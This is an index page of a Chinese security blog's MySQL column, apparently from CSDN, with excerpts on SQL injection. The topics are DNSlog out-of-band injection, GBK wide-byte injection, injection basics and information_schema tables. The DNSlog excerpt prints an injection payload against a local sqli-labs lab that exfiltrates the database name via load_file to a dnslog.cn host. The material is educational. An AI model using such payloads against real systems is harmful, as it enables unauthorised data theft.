MySQL
关注
分享
扫一扫
行云tack
个人博客,与网络安全相关:https://www.xy586.top
希望大佬们赏个脸
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
SQL注入之dns回显注入
DNSlog外带数据注入 用到的网站 http://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/ pyload: 查库 http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查表 http://192.168.232.128/sqllabs/Less-8/?id=1'原创 2020-08-03 18:01:06 · 2111 阅读 · 0 评论 -
SQL注入之宽字节注入
宽字节注入 西欧字母符号,通过1个字节来表示。东亚字符通过至少两个字节来表示。GBK编码就是用两个字节来表示中文区字符的一个编码标准。 GBK编码依然采用双字节编码方案,其编码范围:8140-FEFE(高字节从81到FE,低字节从40到FE),剔除xx7F码位,共23940个码位。 条件 后台使用GBK编码的时候,存在着看不见的ascii码转换为GBK编码的转换过程,可以使用宽字节注入。 原理 编码转换存在着单字符被合并的情形 反斜杠对应url编码%5c,是单字节的。 在%5c前再加入一个单字节字符%dd原创 2020-08-03 18:00:08 · 1434 阅读 · 0 评论 -
sql注入原理及危害
什么是SQLi 前端构造的SQL语句片段拼接到后台SQL语句中,后台缺乏正确识别和过滤,造成与其外的数据库查询结果。 SQLi的危害 从技术上来说:未授权、非法增删改查数据库内容,包括窃取信息、删除数据库、读写系统文件、执行命令等等; 从影响上来说:客户数据丢失、系统交易数据被篡改、网站首页被篡改。 SQLi分类 按照后台处理前端提交参数的类型来分,分两类:数字型注入和字符型注入。 按照请求方式分:GET、POST 按照其他分类方法,还有一些常见数据库注入类型:报错注入、盲注、延时注入、宽字节注入、二次原创 2020-08-03 14:35:35 · 3851 阅读 · 0 评论 -
information_schema数据库表说明:
information_schema数据库表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。 TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。 COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.ta原创 2020-07-16 19:45:53 · 748 阅读 · 23 评论